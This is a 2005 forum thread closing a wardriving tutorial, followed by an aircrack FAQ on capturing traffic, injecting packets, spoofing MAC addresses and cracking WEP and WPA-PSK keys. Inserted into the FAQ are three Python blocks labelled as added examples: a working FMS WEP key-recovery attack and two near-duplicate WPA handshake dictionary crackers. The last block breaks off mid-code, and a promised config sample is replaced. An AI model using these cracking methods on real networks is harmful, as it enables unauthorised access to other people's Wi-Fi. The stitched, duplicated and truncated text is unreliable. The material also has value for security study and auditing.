-d : debug – specify beginning of the key
-f : bruteforce fudge factor (default: 2)
-m : MAC address to filter usable packets
-n : WEP key length: 64 / 128 / 256 / 512
-p : SMP support: # of processes to start
-q : Quiet mode (less print more speed)

./aircrack -n 128 linksys.cap

What I did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and tell aircrack it was 128-bit encryption. If all goes well you will get the key in nice red text.

KEY FOUND: [ Pwn3d ]

Happy WarDriving.

(Please reply with any errors in my tutorial)

Jun 22 2005, 04:24 AM

Good job man, this is a great tutorial. Most of the tutorials I have seen on the topic are, ehh, very Prism-based-card biased. Just my 2c. Thanks for this great tut ;]


Jun 22 2005, 05:37 AM

Thanks for the tutorial, it's very nice, I will test it now.

Jun 22 2005, 07:32 AM

Jun 22 2005, 11:23 AM

Yes, that's the Whoppix tutorial; I based this one on that (if you read it, it says so in the first 5 lines). I am not trying to steal thunder from Whoppix. This tutorial expands on it and adds detail.

Jun 22 2005, 01:47 PM

Nice one UmI. I like the fact it's explained in text too. Flash tuts sometimes aren't very portable and can miss out more technical details.

/me adds tut to his archive smile.gif

belgther: you should read the tutorial before you comment on it tongue.gif

Jun 22 2005, 05:07 PM

QUOTE(belgther @ Jun 22 2005, 07:32 AM)

these guys are trying to get in as full fledged members. there’s no need to always hit the search button and shoot them down. personally, i think it’s explained pretty well.

Jun 24 2005, 10:03 AM

I have a laptop loaded with Fedora, Kismet and AirSnort. I can find loads of encrypted networks where I live, but I'm thinking: is it too late in the day for me to try and have some fun?

i.e. have all the manufacturers fixed the issue with WEP? I don't want to be sat outside a building or house trying to crack a WEP-enabled AP when there is no point.

I have heard that you cannot crack Cisco because you cannot get more than 96 packets or 'interesting packets'.

Anyway, if anyone can let me know, I would appreciate it.

Jul 6 2005, 10:58 AM

We have got some wifi networks at work... Thanks for sharing that tutorial, it's going to be useful to check whether they are secure.

Aircrack documentation:

Here are two files to download from Rapidshare with the programs:

and this

What is aircrack?

aircrack is a collection of tools for auditing wireless networks:

  • airodump: 802.11 packet capture program
  • aireplay: 802.11 packet injection program
  • aircrack: static WEP and WPA-PSK key cracker
  • airdecap: decrypts WEP/WPA capture files

Is there a discussion forum?

Sure: See also aircrack at

Where can I download aircrack?

The official download is at  In any case, if for some reason you do not have access to port 8040, you can also use this mirror:

Aircrack is included in the Troppix LiveCD, which ships the { Prism2 / PrismGT / Realtek / Atheros / Ralink } drivers patched for packet injection, as well as the acx100 and ipw2200 (Centrino b/g) drivers.

I get the message "cygwin1.dll not found" when I start aircrack.exe.

You can download this library from:

To use aircrack, drag the .cap or .ivs capture file(s) onto aircrack.exe. If you want to pass options to the program you will have to open a command prompt (cmd.exe) and enter them by hand; there is also a GUI for aircrack, developed by hexanium.

C:\TEMP> aircrack.exe -n 64 -f 8 out1.cap out2.cap

A list of options can be found further down.

How do I crack a static WEP key?

The basic idea is to capture as much encrypted traffic as possible using airodump. Each WEP data packet carries a 3-byte Initialisation Vector (IV): once a sufficient number of data packets has been collected, run aircrack on the resulting capture file. aircrack will then run a set of statistical attacks developed by a talented hacker named KoreK.

How do I know whether my WEP key is correct?

There are two WEP authentication modes:

  • Open-System Authentication: this is the default. The AP accepts all clients and never checks the key: it always grants association. However, if your key is wrong you will not be able to receive or send packets (because decryption fails), so DHCP, ping, etc. will end up timing out.
  • Shared-Key Authentication: the client has to encrypt a challenge before the AP grants it association. This mode is flawed and leads to key recovery, so it is never enabled by default.

In short, just because you appear to connect successfully to the AP does not mean your WEP key is correct! To check your WEP key, try to decrypt a capture file with the airdecap program.

How many IVs are needed to crack WEP?

WEP cracking is not an exact science. The number of IVs needed depends on the WEP key length, and also on luck. Normally, a 40-bit WEP key can be cracked with 300,000 IVs, and a 104-bit key with 1,000,000 IVs; with bad luck, two million IVs or more may be needed.

There is no way to know the WEP key length: this information is hidden and never announced, neither in management packets nor in data packets; consequently, airodump cannot report the WEP key length. For that reason, it is recommended to run aircrack twice: when you have 250,000 IVs, start aircrack with "-n 64" to crack 40-bit WEP. If the key is not found, restart aircrack (without the -n option) to crack 104-bit WEP.

I don't seem to get any IVs!

Possible reasons:

  • You are too far from the access point.
  • There is no traffic on the chosen network.
  • There is 802.11g traffic but you are capturing in 802.11b mode.
  • There is some problem with your card (firmware problem?)

Beacons are just unencrypted "announcement packets". They are useless for WEP cracking.

I couldn't crack this AP!

Shit happens.

Why isn't there a Windows version of aireplay?

The PEEK driver does not support 802.11 packet injection; I will not port aireplay to Win32. In any case, there are commercial alternatives:

Prism cards:

Atheros cards:

Is my card compatible with airodump / aireplay?

First of all, search Google to find out which chipset your card has. For example, if you have a Linksys WPC54G search for "wpc54g chipset linux".


Chipset | Supported by airodump on Windows? | Supported by airodump on Linux? | Supported by aireplay on Linux?
HermesI | YES (Agere driver) | YES (patched orinoco driver) | NO (the firmware corrupts the MAC header)
Prism2/3 | NO, see LinkFerret for an alternative | YES (HostAP or wlan-ng driver), STA firmware 1.5.6 or newer required | YES (PCI and CardBus only, patching the driver is recommended)
PrismGT | YES (PrismGT driver) | FullMAC: YES (prism54 driver), SoftMAC: NOT YET (prism54usb) | YES (patching the driver is recommended)
Atheros | CardBus: YES (Atheros driver), PCI: NO (see CommView WiFi instead) | YES (PCI and CardBus only, madwifi driver) | YES (patching the driver is required)
RTL8180 | YES (Realtek driver) | YES (rtl8180-sa2400 driver) | UNSTABLE (patching the driver is required)
Aironet | YES? (Cisco driver) | YES (airo driver, firmware version 4.25.30 recommended) | NO (firmware problems)
Ralink | NO | YES (rt2500 / rt2570 driver) | YES (patching the driver is required)
Centrino b | NO | PARTIAL: the ipw2100 driver does not discard corrupted packets | NO
Centrino b/g | NO | YES (ipw2200 driver, version 1.0.6 recommended) | NO (the firmware drops packets)
Broadcom | Old models only (BRCM driver) | NOT TESTED (bcm43xx driver, requires Linux >= 2.6.14) | NO
TI (ACX100 / ACX111) | NO | ALPHA (acx100 driver) | NO
ZyDAS 1201 | NO | NOT YET (zd1211 driver) | NO

The PEEK driver does not recognise my card.

The Windows drivers mentioned above do not recognise some cards, even with the right chipset. In that case, open Device Manager, select your card, "Update driver", choose "Install from a specific location", choose "Don't search, I will choose the driver to install", click "Have Disk", enter the path where the archive was unpacked, untick "Show compatible hardware", and pick the driver.

I have a Prism2 card, but airodump / aireplay don't seem to work!

First step: make sure you are not using the orinoco driver. If the interface name is wlan0, the driver is HostAP or wlan-ng. If the interface name is eth0 or eth1, the driver is orinoco and you must disable it (use cardctl to find out your card's identifier, then edit /etc/pcmcia/config, replace orinoco_cs with hostap_cs and restart cardmgr).

It may also be a firmware problem. Old firmwares have trouble with test mode 0x0A (used by the HostAP / wlan-ng injection patches), so make sure yours is up to date; see the instructions below. The recommended station firmware version is 1.7.4. If it does not work well (kismet or airodump crash after capturing a couple of packets), try STA 1.5.6 (either s1010506.hex for older Prism2 cards, or sf010506.hex for newer ones).

As a side note, test mode 0x0A is somewhat unstable with wlan-ng. If the card seems to lock up, you will have to reset it, or use HostAP instead. Injection on Prism2 USB devices is currently broken with wlan-ng.

Note: here you can find a Prism2 driver for Windows XP for cards with WPA/TKIP support:

I have an Atheros card, and the madwifi patch causes a kernel crash /
aireplay says: enhanced RTC support isn't available.

Some versions of the Linux 2.6 branch (especially before 2.6.11) have problems that will cause a kernel panic when injecting with madwifi. Also, on many 2.6 kernels enhanced RTC support is simply broken. It is therefore highly recommended to use Linux 2.6.11.x or newer.

How do I update my Prism2 firmware?

The simplest way is to update via WinUpdate; this requires the WPC11 v2.5 driver to be installed. Both can be obtained from:

You can also update the firmware with the patched HostAP (see the instructions below on how to patch and install HostAP). Alternatively, boot the Troppix Live CD (which contains an already patched hostap driver and the prism2_srec utility).

Once HostAP is loaded, you can check your primary and station firmware with this command:

 dmesg | grep wifi
hostap_cs: Registered netdevice wifi0
wifi0: NIC: id=0x800c v1.0.0
wifi0: PRI: id=0x15 v1.1.1 (primary firmware is 1.1.1)
wifi0: STA: id=0x1f v1.7.4 (station firmware is 1.7.4)
wifi0: registered netdevice wlan0

If the NIC id is between 0x8002 and 0x8008, you have an old Prism2 and you MUST use STA firmware version 1.5.6 (s1010506.hex). Otherwise, you should use PRI 1.1.1 / STA 1.7.4, which is the most stable firmware version for newer Prism2 cards. Do NOT use firmware 1.7.1 or 1.8.x; people have reported problems with them.

To update the firmware you will need prism2_srec from the hostap-utils package; if it is not already on the system, download and compile hostap-utils:

tar -xvzf hostap-utils-0.4.0.tar.gz
cd hostap-utils-0.4.0
make

Some Prism2 cards have been restricted to a certain set of channels because of national regulations. You can enable all 14 channels with the following commands:

./prism2_srec wlan0 -D > pda; cp pda pda.bak
Edit pda and put 3FFF at offset 0104 (line 24)

Finally, download the firmware and flash your card. If the NIC id is between 0x8002 and 0x8008:

./prism2_srec -v -f wlan0 s1010506.hex -P pda

Otherwise:

./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda

If you get the message "ioctl[PRISM2_IOCTL_HOSTAPD]: Operation not supported", the HostAP driver is not loaded and you must install it. If you get the message "ioctl[PRISM2_IOCTL_DOWNLOAD]: Operation not supported", your HostAP driver has not been patched to support non-volatile download.

Which card should I buy?

The best chipset today is Atheros; it is very well supported on both Windows and Linux. The latest madwifi patch makes it possible to inject raw 802.11 packets in both Infrastructure (Managed) and Monitor mode at b/g speeds.

Ralink makes good chipsets, and has been very cooperative with the open-source community in developing GPL drivers. Packet injection is now fully supported under Linux with RT2500 PCI/PCMCIA cards, and also works on RT2570 USB devices.

Here is a list of recommended cards:


Card name | Type | Chipset | Antenna | Price | Windows support | Linux support
MSI PC54G2 | PCI | Ralink | RP-SMA | €30 | No |
MSI CB54G2 | CardBus | Ralink | Internal | €30 | No |
Linksys WMP54G v4 | PCI | Ralink | RP-SMA | €40 | No |
Linksys WUSB54G v4 | USB | Ralink | Internal | €40 | No |
D-Link DWL-G122 | USB | Ralink | Internal | €45 | No |
Netgear WG111 | USB | PrismGT SoftMAC | Internal | €40 | airodump | No
Netgear WG311T | PCI | Atheros | RP-SMA | €50 | CommView WiFi |
Netgear WG511T | CardBus | Atheros | Internal | €50 | airodump |
Netgear WAG511 | CardBus | Atheros | Internal | €100 | airodump |
Proxim 8470-WD | CardBus | Atheros | MC + Int. | €110 | airodump |

Note: there are some cheaper models with similar names (WG511, WG311, DWL-650+ and DWL-G520+); those cards are not Atheros-based. Also, the Peek driver does not support recent Atheros cards, so you will have to use CommView WiFi instead.

How do I use airodump on Windows?

First of all, make sure your card is compatible (see the table above) and that the right driver is installed. You must also download peek.dll and peek5.sys and put them in the same directory as airodump.exe.

When running airodump, you should specify:

  • The network interface index number, chosen from the list shown by airodump.
  • The network interface type ('o' for HermesI and Realtek, 'a' for Aironet and Atheros).
  • The channel number, between 1 and 14. You can also specify 0 to hop across all channels.
  • The output prefix. For example, if the prefix is "foo", airodump will create foo.cap (captured packets) and foo.txt (CSV statistics). If foo.cap already exists, airodump will continue the capture by appending packets to it.
  • The "IVs only" option. Set it to 1 if you only want to save the IVs of WEP data packets. This saves space, but the resulting file (foo.ivs) will only be useful for WEP cracking.

To stop capturing packets press Ctrl-C. You may get a blue screen, due to a bug in the PEEK driver when it does not leave monitor mode cleanly. The resulting capture file may also be empty. The cause of this bug is unknown.

Why can't I compile airodump and aireplay on BSD / Mac OS X?

The sources of both airodump and aireplay are Linux-specific. There are no plans to port them to other operating systems.

How do I use airodump on Linux?

Before running airodump, you must first run the script that lists the detected wireless interfaces.

  usage: airodump 
[channel] [IVs option]
Specify 0 as the channel to hop across the channels of the 2.4 GHz band.
Set the IVs option to 1 to save only the captured IVs; the resulting
file is only useful for WEP cracking.

If the gpsd daemon is running, airodump will collect and save the
GPS coordinates in text format.

You can convert a .cap / .dump file to .ivs format with the pcap2ivs program (Linux only).

airodump flips between WEP and WPA.

This happens when your driver does not discard corrupted packets (those with an invalid CRC). If it is a Centrino b, there is simply no fix; go and buy a better card. If it is a Prism2, try updating the firmware.

What do the fields shown by airodump mean?

airodump shows a list of the detected access points, and also a list of connected clients or "stations". Here is an example screenshot using a Prism2 card with HostAP:


 BSSID              PWR  Beacons    Data  CH  MB  ENC   ESSID

 00:13:10:30:24:9C   46       15    3416   6  54.  WEP   the ssid
 00:09:5B:1F:44:10   36       54       0  11  11   OPN   NETGEAR

 BSSID              STATION            PWR  Packets  ESSID

 00:13:10:30:24:9C  00:09:5B:EB:C5:2B   48      719  the ssid
 00:13:10:30:24:9C  00:02:2D:C1:5D:1F  190       17  the ssid


Field | Description
BSSID | MAC address of the access point.
PWR | Signal level reported by the card. Its meaning depends on the driver, but the closer you get to the access point or station, the higher the signal. If PWR == -1, the driver does not support reporting the signal level.
Beacons | Number of announcement packets sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far away.
Data | Number of captured data packets (for WEP, only IVs are counted), including broadcast data packets.
CH | Channel number (taken from beacon packets). Note: sometimes data packets from other channels are captured even when not channel hopping, because of radio-frequency interference.
MB | Maximum speed supported by the AP. If MB = 11 it is 802.11b, if MB = 22 it is 802.11b+, and higher speeds are 802.11g.
ENC | Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough data to tell WEP from WPA), WEP (without the question mark) indicates static or dynamic WEP, and WPA if TKIP or CCMP are present.
ESSID | Also known as the "SSID"; it can be empty if SSID hiding is active. In that case airodump will try to recover the SSID from probe responses and association requests.
STATION | MAC address of each associated station. In the screenshot above, two clients were detected (00:09:5B:EB:C5:2B and 00:02:2D:C1:5D:1F).

How do I merge two capture files?

You can use the mergecap program (part of the ethereal-common package or of the win32 distribution):

mergecap -w out.cap test1.cap test2.cap test3.cap

.ivs files can be merged with the "mergeivs" program (Linux only).

Can I use Ethereal to capture 802.11 packets?

Under Linux, just put the card into Monitor mode with the script. Under Windows, Ethereal CANNOT capture 802.11 packets.

Can Ethereal decode WEP data packets?

Yes. Go to Edit -> Preferences -> Protocols -> IEEE 802.11, set "WEP key count" to 1 and enter your WEP key below it.

How do I change my MAC address?

This is only possible under Linux. For example, if you have an Atheros card:

ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

If it does not work, try removing and re-inserting the card.

How do I use aircrack?

Usage: aircrack [options]

You can specify multiple input files (in either .cap or .ivs format). You can also run airodump and aircrack at the same time: aircrack will update itself as new IVs become available.

Here is a summary of all the available options:


Option | Param. | Description
-a | amode | Force the attack mode (1 = static WEP, 2 = WPA-PSK).
-e | essid | If set, all IVs from networks with the same ESSID will be used. This option is required for WPA-PSK cracking when the ESSID is not broadcast (hidden ESSID).
-b | bssid | Select the target network by MAC address.
-p | nbcpu | On SMP systems, specify the number of CPUs with this option.
-q | none | Enable quiet mode (no status output until the key is found, or not found).
-c | none | (WEP cracking) Restrict the search to alphanumeric characters only (0x20 – 0x7F).
-d | start | (WEP cracking) Specify the beginning of the WEP key (in hex), used for debugging.
-m | maddr | (WEP cracking) MAC address to filter WEP data packets by. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use each and every IV, regardless of the network.
-n | nbits | (WEP cracking) Specify the key length: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default is 128.
-i | index | (WEP cracking) Keep only the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index.
-f | fudge | (WEP cracking) By default this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to raise the brute-force level: cracking will take longer, but with a higher chance of success.
-k | korek | (WEP cracking) There are 17 KoreK statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
-x | none | (WEP cracking) Do not brute-force the last two key bytes.
-y | none | (WEP cracking) This is an experimental single brute-force attack, to be used when the standard attack mode fails with more than one million IVs.
-w | words | (WPA cracking) Path to the wordlist.

Could you implement a resume option in aircrack?

There are no plans to implement this feature.

How do I crack a WPA-PSK network?

You must capture until a handshake takes place between a wireless client and the access point. To force the client to re-authenticate you can launch a deauthentication attack with aireplay. A good dictionary is also required; see

For your information: it is not possible to precompute large tables of Pairwise Master Keys the way rainbowcrack does, since the passphrase is salted with the ESSID.
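The dictionary attack just described, and the PMK derivation that the WZCOOK answer further down refers to, carried through in code. This is an added example, not code from the original FAQ or from the aircrack project: the PMK is PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as salt (which is why tables cannot be precomputed per passphrase alone), the PTK comes from the 802.11i PRF over both MAC addresses and both nonces, and the EAPOL-Key MIC is HMAC-MD5 (WPA1) or HMAC-SHA1 truncated to 128 bits (WPA2) keyed with the first 16 bytes of the PTK. The handshake, MAC addresses and nonces are constructed in the script itself from a known passphrase so that the attack has something to verify against.

```python
# Added example, not code from the original FAQ or the aircrack project:
# a WPA-PSK dictionary attack against a *constructed* 4-way handshake.
import hashlib
import hmac
import struct


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The ESSID is the salt, so a PMK table is only valid for one network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both MAC addresses and both nonces; PTK[0:16] is the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, version: int) -> bytes:
    """EAPOL-Key MIC over the frame with its MIC field zeroed. Descriptor
    version 1 (WPA1/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1-128."""
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, eapol_frame, digest).digest()[:16]


def build_eapol_key_msg2(snonce: bytes, version: int) -> bytes:
    """Constructed message 2 of the 4-way handshake (supplicant -> AP) with the
    MIC field zeroed, i.e. exactly the bytes the MIC is computed over."""
    key_info = 0x0100 | 0x0008 | version                  # MIC, Pairwise, descriptor version
    body = bytes([0x02 if version == 2 else 0xFE])        # RSN (0x02) or WPA (0xFE) descriptor
    body += struct.pack(">HHQ", key_info, 0, 1)           # key info, key length, replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)      # nonce, key IV, RSC, key ID
    body += bytes(16) + struct.pack(">H", 0)              # zeroed MIC, key data length
    return struct.pack(">BBH", 2, 3, len(body)) + body    # EAPOL version 2, type 3 = Key


def crack_psk(handshake: dict, wordlist):
    """The aircrack WPA-PSK loop: PMK -> PTK -> KCK for each candidate
    passphrase, then compare the recomputed MIC with the captured one."""
    for word in wordlist:
        kck = wpa_ptk(wpa_pmk(word, handshake["ssid"]), handshake["aa"], handshake["spa"],
                      handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"], handshake["version"]),
                               handshake["mic"]):
            return word
    return None


def make_handshake(passphrase: str, ssid: str, version: int = 2) -> dict:
    """Constructed 'capture' of a handshake protected by `passphrase`.
    The MAC addresses and nonces are sample values, not sniffed data."""
    aa, spa = bytes.fromhex("00095b1f4410"), bytes.fromhex("000c41a1b2c3")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol = build_eapol_key_msg2(snonce, version)
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return dict(ssid=ssid, aa=aa, spa=spa, anonce=anonce, snonce=snonce,
                eapol=eapol, version=version, mic=eapol_mic(kck, eapol, version))


if __name__ == "__main__":
    hs = make_handshake("password", "IEEE")
    print("PMK:", wpa_pmk("password", "IEEE").hex())
    print("recovered passphrase:", crack_psk(hs, ["letmein", "12345678", "password"]))
```

Every candidate costs 4096 HMAC-SHA1 rounds (the 8192 figure quoted later for WZCOOK counts the two 160-bit output blocks), which is the whole reason a weak passphrase is the only practical way in: the work is per word and per ESSID, not reusable across networks.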

Will WPA be cracked in the future?

It is extremely unlikely that WPA will be cracked the way WEP has been.

WEP's biggest problem is that the shared key is appended to the IV; the result is fed straight into RC4. This simple concatenation construction is prone to a statistical attack, since the first bytes of the ciphertext are strongly correlated with the shared key (see Andrew Roos's paper). There are basically two countermeasures against this attack: 1. mix the IV and the shared key with a hashing function, or 2. discard the first 256 bytes of the RC4 output.
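The correlation that the paragraph above and the "How do I crack a static WEP key?" answer rely on, shown in a small simulation. This is an added example, not code from the original FAQ or from the aircrack project; it implements the FMS attack (the ancestor of the KoreK attacks aircrack runs), and the weak-IV form (A+3, 0xFF, X), the 40-bit root key and the "captured" packets are all assumptions constructed inside the script, nothing is sniffed. The only known plaintext needed is the first byte of every WEP data frame, the LLC/SNAP DSAP value 0xAA.

```python
# Added example, not code from the original FAQ or the aircrack project:
# FMS-style recovery of a WEP root key from the first keystream byte of
# constructed weak-IV packets. WEP per-packet key = IV || root key.
import random

SNAP_DSAP = 0xAA  # first plaintext byte of every WEP-encrypted data frame


def rc4_ksa(key):
    """RC4 key scheduling: returns the 256-byte state permutation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S


def rc4_first_byte(key):
    """First PRGA output byte; the attack never needs more than this."""
    S = rc4_ksa(key)
    i, j = 1, S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) % 256]


def wep_first_cipher_byte(iv, root_key):
    """The construction the FAQ criticises: RC4 keyed with IV || root key."""
    return SNAP_DSAP ^ rc4_first_byte(list(iv) + list(root_key))


def weak_iv(b, x):
    """Classic FMS weak IV targeting root-key byte b: (b+3, 0xFF, x)."""
    return (b + 3, 0xFF, x)


def fms_candidate(iv, known, b, z1):
    """Replay the KSA over the b+3 key bytes we already know (IV plus the
    recovered prefix). If the state is 'resolved', the first keystream byte
    z1 points at root_key[b] with probability ~5%; return that candidate."""
    key = list(iv) + list(known)
    S = list(range(256))
    j = 0
    for i in range(b + 3):
        j = (j + S[i] + key[i]) % 256
        S[i], S[j] = S[j], S[i]
    if S[1] < b + 3 and S[1] + S[S[1]] == b + 3:
        return (S.index(z1) - j - S[b + 3]) % 256
    return None


def crack_wep(packets, key_len):
    """packets: iterable of (iv, first ciphertext byte). Recovers the root key
    byte by byte by majority vote, which is why IV count, not CPU, is what matters."""
    known = []
    for b in range(key_len):
        votes = [0] * 256
        for iv, c1 in packets:
            if iv[0] != b + 3:          # only IVs aimed at this key byte
                continue
            cand = fms_candidate(iv, known, b, c1 ^ SNAP_DSAP)
            if cand is not None:
                votes[cand] += 1
        known.append(max(range(256), key=votes.__getitem__))
    return bytes(known)


def make_capture(root_key, ivs_per_byte, seed=1):
    """Constructed 'capture': weak-IV packets encrypted under root_key."""
    rng = random.Random(seed)
    packets = []
    for b in range(len(root_key)):
        for _ in range(ivs_per_byte):
            iv = weak_iv(b, rng.randrange(256))
            packets.append((iv, wep_first_cipher_byte(iv, root_key)))
    return packets


def demo():
    root_key = bytes([0x1F, 0x8B, 0x02, 0xC4, 0x5E])   # constructed 40-bit WEP key
    capture = make_capture(root_key, ivs_per_byte=800)
    return crack_wep(capture, len(root_key)) == root_key


if __name__ == "__main__":
    print("root key recovered:", demo())
```

The vote for the right byte wins by a wide margin with a few hundred resolved IVs per key byte, while wrong candidates stay near the 1/256 noise floor; either countermeasure named above (hashing the IV into the key, or dropping the first 256 keystream bytes) breaks the link between the IV and the first output byte that `fms_candidate` exploits.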

There has been some misinformation in the news about TKIP flaws:

For now, TKIP is reasonably secure on its own, but it is living on borrowed time since it relies on the same RC4 algorithm that WEP relied on.

Actually, TKIP (WPA1) is not vulnerable: for each packet, the 48-bit IV is mixed with the 128-bit pairwise temporal key to create a 104-bit RC4 key, so there is no statistical correlation at all. Furthermore, WPA provides countermeasures against active attacks (traffic reinjection), includes a stronger message integrity code (Michael), and has a very robust authentication protocol (the 4-way handshake). The only vulnerability to worry about is the dictionary attack, which fails if the passphrase is robust enough.

WPA2 (aka 802.11i) is exactly the same as WPA1, except that it uses CCMP (AES in counter mode) instead of RC4, and HMAC-SHA1 instead of HMAC-MD5 for the EAPOL MIC. As a final note, WPA2 is slightly better than WPA1, but neither of them will be cracked in the near future.

I have more than one million IVs, but aircrack does not find the key!

Possible reasons:

  • Bad luck: you need to capture more IVs. Usually a 104-bit WEP key can be cracked with about one million IVs, but sometimes more are needed.
  • If all the votes look the same, or if there are many negative votes, then the capture file is corrupted, or the key is not static (is EAP/802.1X being used?).
  • A false positive prevented the key from being found. Try disabling each KoreK attack (-k 1 .. 17), raising the brute-force level (-f), or trying the experimental single brute-force attack (-y).

I found a key, how do I decrypt a capture file?

You can use the airdecap program:

  usage: airdecap [options] <capture file>

  -l        : don't remove the 802.11 header
  -b bssid  : access point MAC address filter
  -k pmk    : WPA Pairwise Master Key in hex
  -e essid  : target network ASCII identifier
  -p pass   : target network WPA passphrase
  -w key    : target network WEP key in hex

  airdecap -b 00:09:5B:10:BC:5A open-network.cap
  airdecap -w 11A3E229084349BC25D97E2939 wep.cap
  airdecap -e "the ssid" -p passphrase tkip.cap

How do I recover my WEP key on Windows?

You can use the WZCOOK program, which recovers WEP keys from XP's Wireless Zero Configuration utility. This is experimental software, so it may or may not work depending on your service pack level.

Does WZCOOK also recover WPA keys?

WZCOOK will show the PMK (Pairwise Master Key), a 256-bit value that is the result of hashing the passphrase 8192 times together with the ESSID and the ESSID length (PBKDF2-HMAC-SHA1 with 4096 iterations for each of the two 160-bit output blocks). The passphrase itself cannot be recovered; however, knowing the PMK is enough to connect to a WPA-protected wireless network with wpa_supplicant (see the Windows README). Your wpa_supplicant.conf file should look like this:
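As an added example (this is not aircrack, WZCOOK or wpa_supplicant code), the derivation described above in working Python, covering several points of this FAQ at once: the PMK is PBKDF2-HMAC-SHA1 over the passphrase salted with the ESSID (which is why, as noted under the WPA cracking question, a precomputed PMK table is only usable against one network name); a captured 4-way handshake is checked by recomputing the EAPOL MIC with HMAC-MD5 (WPA1/TKIP) or HMAC-SHA1 (WPA2/CCMP) under each candidate passphrase, which is the dictionary attack aircrack runs with -w; and a recovered PMK can be written straight into wpa_supplicant.conf as a 64-hex-digit psk=. The handshake values (MAC addresses taken from this FAQ's examples, the nonces and the EAPOL frame body) are constructed sample data, not a real capture; the passphrase "password" with SSID "IEEE" is the published 802.11i test vector.

```python
"""Added example (not aircrack, WZCOOK or wpa_supplicant code).

WPA-PSK key hierarchy, the EAPOL MIC check behind a handshake dictionary
attack, and the wpa_supplicant stanza that uses a raw PMK.
All handshake values below are constructed sample data.
"""
import hashlib
import hmac
from typing import Iterable, Optional


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 256 bits).

    The 256-bit output is two SHA-1 sized blocks of 4096 HMACs each: the
    "8192 hashes" quoted above. Salting with the ESSID is why a generic
    rainbow table is impossible; a table is only valid for one ESSID.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus both MAC addresses and both handshake nonces.
    Everything except the PMK is visible in the captured handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, ccmp: bool) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed): HMAC-MD5 for WPA1/TKIP,
    HMAC-SHA1 truncated to 128 bits for WPA2/CCMP, keyed with KCK = PTK[0:16]."""
    digest = hashlib.sha1 if ccmp else hashlib.md5
    return hmac.new(kck, eapol_frame, digest).digest()[:16]


def dictionary_attack(ssid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
                      eapol_frame: bytes, captured_mic: bytes, ccmp: bool,
                      wordlist: Iterable[str]) -> Optional[str]:
    """What 'aircrack -w wordlist out.cap' does with a captured handshake:
    derive PMK -> PTK -> KCK per candidate and compare the recomputed MIC."""
    for candidate in wordlist:
        try:
            pmk = wpa_pmk(candidate, ssid)
        except ValueError:
            continue  # not a legal WPA passphrase length, skip it
        kck = wpa_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, ccmp), captured_mic):
            return candidate
    return None


def wpa_supplicant_network_block(ssid: str, pmk: bytes) -> str:
    """wpa_supplicant.conf stanza using the PMK directly: an unquoted
    64-hex-digit psk= is taken as the raw PMK, so the passphrase is not needed."""
    return "\n".join([
        "network={",
        f'\tssid="{ssid}"',
        f"\tpsk={pmk.hex()}",
        "\tkey_mgmt=WPA-PSK",
        "}",
    ])


# --- constructed sample handshake (not a real capture) ---------------------
SAMPLE_SSID = "the ssid"
SAMPLE_AA = bytes.fromhex("00131030249C")       # AP MAC from this FAQ's examples
SAMPLE_SPA = bytes.fromhex("00095BEBC52B")      # client MAC from this FAQ's examples
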